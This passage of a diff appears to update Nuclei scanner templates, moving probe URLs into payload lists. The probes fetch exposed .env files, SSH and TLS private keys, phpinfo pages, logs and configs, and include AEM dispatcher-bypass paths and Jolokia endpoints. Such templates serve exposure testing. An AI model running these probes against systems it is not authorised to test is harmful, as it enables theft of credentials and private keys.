+        - "/.github/workflows/ci.yml"
+        - "/.github/workflows/ci.yaml"
+        - "/.github/workflows/CI.yml"
+        - "/.github/workflows/main.yml"
+        - "/.github/workflows/main.yaml"
+        - "/.github/workflows/build.yml"
+        - "/.github/workflows/build.yaml"
+        - "/.github/workflows/test.yml"
+        - "/.github/workflows/test.yaml"
+        - "/.github/workflows/tests.yml"
+        - "/.github/workflows/tests.yaml"
+        - "/.github/workflows/release.yml"
+        - "/.github/workflows/publish.yml"
+        - "/.github/workflows/deploy.yml"
+        - "/.github/workflows/push.yml"
+        - "/.github/workflows/lint.yml"
+        - "/.github/workflows/coverage.yml"
+        - "/.github/workflows/release.yaml"
+        - "/.github/workflows/pr.yml"
+        - "/.github/workflows/automerge.yml"
+        - "/.github/workflows/docker.yml"
+        - "/.github/workflows/ci-generated.yml"
+        - "/.github/workflows/ci-push.yml"
+        - "/.github/workflows/ci-daily.yml"
+        - "/.github/workflows/ci-issues.yml"
+        - "/.github/workflows/smoosh-status.yml"
+        - "/.github/workflows/snyk.yml"
 
     matchers-condition: and
     matchers:

http/exposures/configs/laravel-env.yaml

@@ -20,28 +20,31 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/.env"
-      - "{{BaseURL}}/.env.bak"
-      - "{{BaseURL}}/.env.dev"
-      - "{{BaseURL}}/.env.dev.local"
-      - "{{BaseURL}}/.env.development.local"
-      - "{{BaseURL}}/.env.prod"
-      - "{{BaseURL}}/.env.prod.local"
-      - "{{BaseURL}}/.env.production"
-      - "{{BaseURL}}/.env.production.local"
-      - "{{BaseURL}}/.env.local"
-      - "{{BaseURL}}/.env.example"
-      - "{{BaseURL}}/.env.stage"
-      - "{{BaseURL}}/.env.live"
-      - "{{BaseURL}}/.env.backup"
-      - "{{BaseURL}}/.env.save"
-      - "{{BaseURL}}/.env.old"
-      - "{{BaseURL}}/.env.www"
-      - "{{BaseURL}}/.env_1"
-      - "{{BaseURL}}/.env_sample"
-      - "{{BaseURL}}/.env.{{DN}}"
-      - "{{BaseURL}}/.env.{{SD}}"
-      - "{{BaseURL}}/api/.env"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/.env"
+        - "/.env.bak"
+        - "/.env.dev"
+        - "/.env.dev.local"
+        - "/.env.development.local"
+        - "/.env.prod"
+        - "/.env.prod.local"
+        - "/.env.production"
+        - "/.env.production.local"
+        - "/.env.local"
+        - "/.env.example"
+        - "/.env.stage"
+        - "/.env.live"
+        - "/.env.backup"
+        - "/.env.save"
+        - "/.env.old"
+        - "/.env.www"
+        - "/.env_1"
+        - "/.env_sample"
+        - "/.env.{{DN}}"
+        - "/.env.{{SD}}"
+        - "/api/.env"
 
     matchers-condition: and
     matchers:

http/exposures/configs/phpinfo-files.yaml

@@ -16,31 +16,34 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/php.php"
-      - "{{BaseURL}}/php2.php"
-      - "{{BaseURL}}/phpinfo.php"
-      - "{{BaseURL}}/info.php"
-      - "{{BaseURL}}/infophp.php"
-      - "{{BaseURL}}/php_info.php"
-      - "{{BaseURL}}/test.php"
-      - "{{BaseURL}}/i.php"
-      - "{{BaseURL}}/p.php"
-      - "{{BaseURL}}/pi.php"
-      - "{{BaseURL}}/asdf.php"
-      - "{{BaseURL}}/pinfo.php"
-      - "{{BaseURL}}/phpversion.php"
-      - "{{BaseURL}}/time.php"
-      - "{{BaseURL}}/index.php"
-      - "{{BaseURL}}/temp.php"
-      - "{{BaseURL}}/old_phpinfo.php"
-      - "{{BaseURL}}/infos.php"
-      - "{{BaseURL}}/linusadmin-phpinfo.php"
-      - "{{BaseURL}}/php-info.php"
-      - "{{BaseURL}}/dashboard/phpinfo.php"
-      - "{{BaseURL}}/_profiler/phpinfo.php"
-      - "{{BaseURL}}/_profiler/phpinfo"
-      - "{{BaseURL}}/?phpinfo=1"
-      - "{{BaseURL}}/l.php?act=phpinfo"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/php.php"
+        - "/php2.php"
+        - "/phpinfo.php"
+        - "/info.php"
+        - "/infophp.php"
+        - "/php_info.php"
+        - "/test.php"
+        - "/i.php"
+        - "/p.php"
+        - "/pi.php"
+        - "/asdf.php"
+        - "/pinfo.php"
+        - "/phpversion.php"
+        - "/time.php"
+        - "/index.php"
+        - "/temp.php"
+        - "/old_phpinfo.php"
+        - "/infos.php"
+        - "/linusadmin-phpinfo.php"
+        - "/php-info.php"
+        - "/dashboard/phpinfo.php"
+        - "/_profiler/phpinfo.php"
+        - "/_profiler/phpinfo"
+        - "/?phpinfo=1"
+        - "/l.php?act=phpinfo"
 
     stop-at-first-match: true
 

http/exposures/configs/server-private-keys.yaml

@@ -16,51 +16,54 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/localhost.key"
-      - "{{BaseURL}}/host.key"
-      - "{{BaseURL}}/www.key"
-      - "{{BaseURL}}/private-key"
-      - "{{BaseURL}}/privatekey.key"
-      - "{{BaseURL}}/server.key"
-      - "{{BaseURL}}/my.key"
-      - "{{BaseURL}}/key.pem"
-      - "{{BaseURL}}/ssl/localhost.key"
-      - "{{BaseURL}}/ssl/{{Hostname}}.key"
-      - "{{BaseURL}}/id_rsa"
-      - "{{BaseURL}}/id_dsa"
-      - "{{BaseURL}}/id_rsa_1024"
-      - "{{BaseURL}}/id_rsa_2048"
-      - "{{BaseURL}}/id_rsa_3072"
-      - "{{BaseURL}}/id_rsa_4096"
-      - "{{BaseURL}}/.ssh/id_rsa"
-      - "{{BaseURL}}/.ssh/id_dsa"
-      - "{{BaseURL}}/.ssh/id_rsa_1024"
-      - "{{BaseURL}}/.ssh/id_rsa_2048"
-      - "{{BaseURL}}/.ssh/id_rsa_3072"
-      - "{{BaseURL}}/.ssh/id_rsa_4096"
-      - "{{BaseURL}}/{{Hostname}}.key"
-      - "{{BaseURL}}/{{Hostname}}.pem"
-      - "{{BaseURL}}/config/jwt/private.pem"
-      - "{{BaseURL}}/jwt/private.pem"
-      - "{{BaseURL}}/var/jwt/private.pem"
-      - "{{BaseURL}}/private.pem"
-      - "{{BaseURL}}/ssl.txt"
-      - "{{BaseURL}}/ssl_key.txt"
-      - "{{BaseURL}}/certificates/{{Host}}.pfx"
-      - "{{BaseURL}}/certificates/{{Host}}.p12"
-      - "{{BaseURL}}/ssl/{{Host}}.pem"
-      - "{{BaseURL}}/ssl/{{Host}}_key.txt"
-      - "{{BaseURL}}/cert/{{Host}}_key.txt"
-      - "{{BaseURL}}/cert/{{RDN}}_key.txt"
-      - "{{BaseURL}}/cert/{{Host}}.txt"
-      - "{{BaseURL}}/ssl/private/{{Host}}_key.pem"
-      - "{{BaseURL}}/certs/{{Host}}_private.key"
-      - "{{BaseURL}}/certs/{{Host}}.key"
-      - "{{BaseURL}}/certificates/{{Host}}_priv.pem"
-      - "{{BaseURL}}/certificates/{{Host}}_privkey.pem"
-      - "{{BaseURL}}/certs/{{Host}}.pem"
-      - "{{BaseURL}}/private/{{Host}}.key"
-      - "{{BaseURL}}/keys/{{Host}}.pem"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/localhost.key"
+        - "/host.key"
+        - "/www.key"
+        - "/private-key"
+        - "/privatekey.key"
+        - "/server.key"
+        - "/my.key"
+        - "/key.pem"
+        - "/ssl/localhost.key"
+        - "/ssl/{{Hostname}}.key"
+        - "/id_rsa"
+        - "/id_dsa"
+        - "/id_rsa_1024"
+        - "/id_rsa_2048"
+        - "/id_rsa_3072"
+        - "/id_rsa_4096"
+        - "/.ssh/id_rsa"
+        - "/.ssh/id_dsa"
+        - "/.ssh/id_rsa_1024"
+        - "/.ssh/id_rsa_2048"
+        - "/.ssh/id_rsa_3072"
+        - "/.ssh/id_rsa_4096"
+        - "/{{Hostname}}.key"
+        - "/{{Hostname}}.pem"
+        - "/config/jwt/private.pem"
+        - "/jwt/private.pem"
+        - "/var/jwt/private.pem"
+        - "/private.pem"
+        - "/ssl.txt"
+        - "/ssl_key.txt"
+        - "/certificates/{{Host}}.pfx"
+        - "/certificates/{{Host}}.p12"
+        - "/ssl/{{Host}}.pem"
+        - "/ssl/{{Host}}_key.txt"
+        - "/cert/{{Host}}_key.txt"
+        - "/cert/{{RDN}}_key.txt"
+        - "/cert/{{Host}}.txt"
+        - "/ssl/private/{{Host}}_key.pem"
+        - "/certs/{{Host}}_private.key"
+        - "/certs/{{Host}}.key"
+        - "/certificates/{{Host}}_priv.pem"
+        - "/certificates/{{Host}}_privkey.pem"
+        - "/certs/{{Host}}.pem"
+        - "/private/{{Host}}.key"
+        - "/keys/{{Host}}.pem"
 
     stop-at-first-match: true
 

http/exposures/configs/zend-config-file.yaml

@@ -12,19 +12,22 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/application/configs/application.ini"
-      - "{{BaseURL}}/admin/configs/application.ini"
-      - "{{BaseURL}}/application.ini"
-      - "{{BaseURL}}/aplicacao/application/configs/application.ini"
-      - "{{BaseURL}}/cloudexp/application/configs/application.ini"
-      - "{{BaseURL}}/cms/application/configs/application.ini"
-      - "{{BaseURL}}/moto/application/configs/application.ini"
-      - "{{BaseURL}}/Partners/application/configs/application.ini"
-      - "{{BaseURL}}/radio/application/configs/application.ini"
-      - "{{BaseURL}}/seminovos/application/configs/application.ini"
-      - "{{BaseURL}}/shop/application/configs/application.ini"
-      - "{{BaseURL}}/site_cg/application/configs/application.ini"
-      - "{{BaseURL}}/slr/application/configs/application.ini"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/application/configs/application.ini"
+        - "/admin/configs/application.ini"
+        - "/application.ini"
+        - "/aplicacao/application/configs/application.ini"
+        - "/cloudexp/application/configs/application.ini"
+        - "/cms/application/configs/application.ini"
+        - "/moto/application/configs/application.ini"
+        - "/Partners/application/configs/application.ini"
+        - "/radio/application/configs/application.ini"
+        - "/seminovos/application/configs/application.ini"
+        - "/shop/application/configs/application.ini"
+        - "/site_cg/application/configs/application.ini"
+        - "/slr/application/configs/application.ini"
 
     stop-at-first-match: true
 

http/exposures/files/routes-ini.yaml

@@ -14,21 +14,24 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/routes.ini"
-      - "{{BaseURL}}/config/routes.ini"
-      - "{{BaseURL}}/admin/configs/routes.ini"
-      - "{{BaseURL}}/application/configs/routes.ini"
-      - "{{BaseURL}}/aplicacao/routes/configs/routes.ini"
-      - "{{BaseURL}}/routes/configs/routes.ini"
-      - "{{BaseURL}}/cloudexp/routes/configs/routes.ini"
-      - "{{BaseURL}}/cms/routes/configs/routes.ini"
-      - "{{BaseURL}}/moto/routes/configs/routes.ini"
-      - "{{BaseURL}}/Partners/routes/configs/routes.ini"
-      - "{{BaseURL}}/radio/routes/configs/routes.ini"
-      - "{{BaseURL}}/seminovos/routes/configs/routes.ini"
-      - "{{BaseURL}}/shop/routes/configs/routes.ini"
-      - "{{BaseURL}}/site_cg/routes/configs/routes.ini"
-      - "{{BaseURL}}/slr/routes/configs/routes.ini"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/routes.ini"
+        - "/config/routes.ini"
+        - "/admin/configs/routes.ini"
+        - "/application/configs/routes.ini"
+        - "/aplicacao/routes/configs/routes.ini"
+        - "/routes/configs/routes.ini"
+        - "/cloudexp/routes/configs/routes.ini"
+        - "/cms/routes/configs/routes.ini"
+        - "/moto/routes/configs/routes.ini"
+        - "/Partners/routes/configs/routes.ini"
+        - "/radio/routes/configs/routes.ini"
+        - "/seminovos/routes/configs/routes.ini"
+        - "/shop/routes/configs/routes.ini"
+        - "/site_cg/routes/configs/routes.ini"
+        - "/slr/routes/configs/routes.ini"
 
     stop-at-first-match: true
 

http/exposures/files/shellscripts.yaml

@@ -12,33 +12,36 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/.build.sh"
-      - "{{BaseURL}}/.jenkins.sh"
-      - "{{BaseURL}}/.travis.sh"
-      - "{{BaseURL}}/install.sh"
-      - "{{BaseURL}}/update.sh"
-      - "{{BaseURL}}/upload.sh"
-      - "{{BaseURL}}/config.sh"
-      - "{{BaseURL}}/build.sh"
-      - "{{BaseURL}}/setup.sh"
-      - "{{BaseURL}}/run.sh"
-      - "{{BaseURL}}/backup.sh"
-      - "{{BaseURL}}/compile.sh"
-      - "{{BaseURL}}/env.sh"
-      - "{{BaseURL}}/init.sh"
-      - "{{BaseURL}}/startup.sh"
-      - "{{BaseURL}}/wp-setup.sh"
-      - "{{BaseURL}}/deploy.sh"
-      - "{{BaseURL}}/aws.sh"
-      - "{{BaseURL}}/reminder.sh"
-      - "{{BaseURL}}/mysqlbackup.sh"
-      - "{{BaseURL}}/dev2local.sh"
-      - "{{BaseURL}}/local2dev.sh"
-      - "{{BaseURL}}/local2prod.sh"
-      - "{{BaseURL}}/prod2local.sh"
-      - "{{BaseURL}}/rsync.sh"
-      - "{{BaseURL}}/sync.sh"
-      - "{{BaseURL}}/test.sh"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/.build.sh"
+        - "/.jenkins.sh"
+        - "/.travis.sh"
+        - "/install.sh"
+        - "/update.sh"
+        - "/upload.sh"
+        - "/config.sh"
+        - "/build.sh"
+        - "/setup.sh"
+        - "/run.sh"
+        - "/backup.sh"
+        - "/compile.sh"
+        - "/env.sh"
+        - "/init.sh"
+        - "/startup.sh"
+        - "/wp-setup.sh"
+        - "/deploy.sh"
+        - "/aws.sh"
+        - "/reminder.sh"
+        - "/mysqlbackup.sh"
+        - "/dev2local.sh"
+        - "/local2dev.sh"
+        - "/local2prod.sh"
+        - "/prod2local.sh"
+        - "/rsync.sh"
+        - "/sync.sh"
+        - "/test.sh"
 
     matchers-condition: and
     matchers:

http/exposures/logs/error-logs.yaml

@@ -12,35 +12,38 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/php_errors.log"
-      - "{{BaseURL}}/MyErrors.log"
-      - "{{BaseURL}}/admin/error.log"
-      - "{{BaseURL}}/admin/errors.log"
-      - "{{BaseURL}}/admin/log/error.log"
-      - "{{BaseURL}}/admin/logs/error.log"
-      - "{{BaseURL}}/admin/logs/errors.log"
-      - "{{BaseURL}}/application/logs/application.log"
-      - "{{BaseURL}}/application/logs/default.log"
-      - "{{BaseURL}}/config/error_log"
-      - "{{BaseURL}}/error.log"
-      - "{{BaseURL}}/error.txt"
-      - "{{BaseURL}}/error/error.log"
-      - "{{BaseURL}}/error_log"
-      - "{{BaseURL}}/error_log.txt"
-      - "{{BaseURL}}/errors.log"
-      - "{{BaseURL}}/errors.txt"
-      - "{{BaseURL}}/errors/errors.log"
-      - "{{BaseURL}}/errors_log"
-      - "{{BaseURL}}/log.log"
-      - "{{BaseURL}}/log.txt"
-      - "{{BaseURL}}/log/error.log"
-      - "{{BaseURL}}/log/errors.log"
-      - "{{BaseURL}}/logs.txt"
-      - "{{BaseURL}}/logs/error.log"
-      - "{{BaseURL}}/logs/errors.log"
-      - "{{BaseURL}}/routes/error_log"
-      - "{{BaseURL}}/{{Hostname}}/error.log"
-      - "{{BaseURL}}/{{Hostname}}/errors.log"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/php_errors.log"
+        - "/MyErrors.log"
+        - "/admin/error.log"
+        - "/admin/errors.log"
+        - "/admin/log/error.log"
+        - "/admin/logs/error.log"
+        - "/admin/logs/errors.log"
+        - "/application/logs/application.log"
+        - "/application/logs/default.log"
+        - "/config/error_log"
+        - "/error.log"
+        - "/error.txt"
+        - "/error/error.log"
+        - "/error_log"
+        - "/error_log.txt"
+        - "/errors.log"
+        - "/errors.txt"
+        - "/errors/errors.log"
+        - "/errors_log"
+        - "/log.log"
+        - "/log.txt"
+        - "/log/error.log"
+        - "/log/errors.log"
+        - "/logs.txt"
+        - "/logs/error.log"
+        - "/logs/errors.log"
+        - "/routes/error_log"
+        - "/{{Hostname}}/error.log"
+        - "/{{Hostname}}/errors.log"
 
     stop-at-first-match: true
 

http/misconfiguration/aem/aem-default-get-servlet.yaml

@@ -16,70 +16,73 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/etc'
-      - '{{BaseURL}}/var'
-      - '{{BaseURL}}/apps'
-      - '{{BaseURL}}/home'
-      - '{{BaseURL}}///etc'
-      - '{{BaseURL}}///var'
-      - '{{BaseURL}}///apps'
-      - '{{BaseURL}}///home'
-      - '{{BaseURL}}/.json'
-      - '{{BaseURL}}/.1.json'
-      - '{{BaseURL}}/....4.2.1....json'
-      - '{{BaseURL}}/.json?FNZ.css'
-      - '{{BaseURL}}/.json?FNZ.ico'
-      - '{{BaseURL}}/.json?FNZ.html'
-      - '{{BaseURL}}/.json/FNZ.css'
-      - '{{BaseURL}}/.json/FNZ.html'
-      - '{{BaseURL}}/.json/FNZ.png'
-      - '{{BaseURL}}/.json/FNZ.ico'
-      - '{{BaseURL}}/.children.1.json'
-      - '{{BaseURL}}/.children....4.2.1....json'
-      - '{{BaseURL}}/.children.json?FNZ.css'
-      - '{{BaseURL}}/.children.json?FNZ.ico'
-      - '{{BaseURL}}/.children.json?FNZ.html'
-      - '{{BaseURL}}/.children.json/FNZ.css'
-      - '{{BaseURL}}/.children.json/FNZ.html'
-      - '{{BaseURL}}/.children.json/FNZ.png'
-      - '{{BaseURL}}/.children.json/FNZ.ico'
-      - '{{BaseURL}}/etc.json'
-      - '{{BaseURL}}/etc.1.json'
-      - '{{BaseURL}}/etc....4.2.1....json'
-      - '{{BaseURL}}/etc.json?FNZ.css'
-      - '{{BaseURL}}/etc.json?FNZ.ico'
-      - '{{BaseURL}}/etc.json?FNZ.html'
-      - '{{BaseURL}}/etc.json/FNZ.css'
-      - '{{BaseURL}}/etc.json/FNZ.html'
-      - '{{BaseURL}}/etc.json/FNZ.ico'
-      - '{{BaseURL}}/etc.children.json'
-      - '{{BaseURL}}/etc.children.1.json'
-      - '{{BaseURL}}/etc.children....4.2.1....json'
-      - '{{BaseURL}}/etc.children.json?FNZ.css'
-      - '{{BaseURL}}/etc.children.json?FNZ.ico'
-      - '{{BaseURL}}/etc.children.json?FNZ.html'
-      - '{{BaseURL}}/etc.children.json/FNZ.css'
-      - '{{BaseURL}}/etc.children.json/FNZ.html'
-      - '{{BaseURL}}/etc.children.json/FNZ.png'
-      - '{{BaseURL}}/etc.children.json/FNZ.ico'
-      - '{{BaseURL}}///etc.json'
-      - '{{BaseURL}}///etc.1.json'
-      - '{{BaseURL}}///etc....4.2.1....json'
-      - '{{BaseURL}}///etc.json?FNZ.css'
-      - '{{BaseURL}}///etc.json?FNZ.ico'
-      - '{{BaseURL}}///etc.json/FNZ.html'
-      - '{{BaseURL}}///etc.json/FNZ.png'
-      - '{{BaseURL}}///etc.json/FNZ.ico'
-      - '{{BaseURL}}///etc.children.json'
-      - '{{BaseURL}}///etc.children.1.json'
-      - '{{BaseURL}}///etc.children....4.2.1....json'
-      - '{{BaseURL}}///etc.children.json?FNZ.css'
-      - '{{BaseURL}}///etc.children.json?FNZ.ico'
-      - '{{BaseURL}}///etc.children.json?FNZ.html'
-      - '{{BaseURL}}///etc.children.json/FNZ.css'
-      - '{{BaseURL}}///etc.children.json/FNZ.html'
-      - '{{BaseURL}}///etc.children.json/FNZ.png'
-      - '{{BaseURL}}///etc.children.json/FNZ.ico'
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/etc"
+        - "/var"
+        - "/apps"
+        - "/home"
+        - "///etc"
+        - "///var"
+        - "///apps"
+        - "///home"
+        - "/.json"
+        - "/.1.json"
+        - "/....4.2.1....json"
+        - "/.json?FNZ.css"
+        - "/.json?FNZ.ico"
+        - "/.json?FNZ.html"
+        - "/.json/FNZ.css"
+        - "/.json/FNZ.html"
+        - "/.json/FNZ.png"
+        - "/.json/FNZ.ico"
+        - "/.children.1.json"
+        - "/.children....4.2.1....json"
+        - "/.children.json?FNZ.css"
+        - "/.children.json?FNZ.ico"
+        - "/.children.json?FNZ.html"
+        - "/.children.json/FNZ.css"
+        - "/.children.json/FNZ.html"
+        - "/.children.json/FNZ.png"
+        - "/.children.json/FNZ.ico"
+        - "/etc.json"
+        - "/etc.1.json"
+        - "/etc....4.2.1....json"
+        - "/etc.json?FNZ.css"
+        - "/etc.json?FNZ.ico"
+        - "/etc.json?FNZ.html"
+        - "/etc.json/FNZ.css"
+        - "/etc.json/FNZ.html"
+        - "/etc.json/FNZ.ico"
+        - "/etc.children.json"
+        - "/etc.children.1.json"
+        - "/etc.children....4.2.1....json"
+        - "/etc.children.json?FNZ.css"
+        - "/etc.children.json?FNZ.ico"
+        - "/etc.children.json?FNZ.html"
+        - "/etc.children.json/FNZ.css"
+        - "/etc.children.json/FNZ.html"
+        - "/etc.children.json/FNZ.png"
+        - "/etc.children.json/FNZ.ico"
+        - "///etc.json"
+        - "///etc.1.json"
+        - "///etc....4.2.1....json"
+        - "///etc.json?FNZ.css"
+        - "///etc.json?FNZ.ico"
+        - "///etc.json/FNZ.html"
+        - "///etc.json/FNZ.png"
+        - "///etc.json/FNZ.ico"
+        - "///etc.children.json"
+        - "///etc.children.1.json"
+        - "///etc.children....4.2.1....json"
+        - "///etc.children.json?FNZ.css"
+        - "///etc.children.json?FNZ.ico"
+        - "///etc.children.json?FNZ.html"
+        - "///etc.children.json/FNZ.css"
+        - "///etc.children.json/FNZ.html"
+        - "///etc.children.json/FNZ.png"
+        - "///etc.children.json/FNZ.ico"
 
     stop-at-first-match: true
 

http/misconfiguration/aem/aem-gql-servlet.yaml

@@ -15,35 +15,38 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico'
-      - '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix='
-      - '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix='
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico"
+        - "/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix="
+        - "/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix="
+        - "///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix="
 
     stop-at-first-match: true
 

http/misconfiguration/aem/aem-misc-admin.yaml

@@ -18,15 +18,18 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/miscadmin"
-      - "{{BaseURL}}/mcmadmin#/content/dashboard"
-      - "{{BaseURL}}/miscadmin#/etc/mobile"
-      - "{{BaseURL}}/miscadmin#/etc/segmentation"
-      - "{{BaseURL}}/miscadmin#/etc/blueprints"
-      - "{{BaseURL}}/miscadmin#/etc/designs"
-      - "{{BaseURL}}/miscadmin#/etc/importers"
-      - "{{BaseURL}}/miscadmin#/etc/reports"
-      - "{{BaseURL}}/miscadmin#/etc/msm/rolloutconfigs"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/miscadmin"
+        - "/mcmadmin#/content/dashboard"
+        - "/miscadmin#/etc/mobile"
+        - "/miscadmin#/etc/segmentation"
+        - "/miscadmin#/etc/blueprints"
+        - "/miscadmin#/etc/designs"
+        - "/miscadmin#/etc/importers"
+        - "/miscadmin#/etc/reports"
+        - "/miscadmin#/etc/msm/rolloutconfigs"
 
     stop-at-first-match: true
 

http/misconfiguration/jolokia/jolokia-info-disclosure.yaml

@@ -15,22 +15,25 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
-      - "{{BaseURL}}/actuator/jolokia/read/java.lang:type=Memory"
-      - "{{BaseURL}}/jolokia/read/java.lang:type=Memory"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
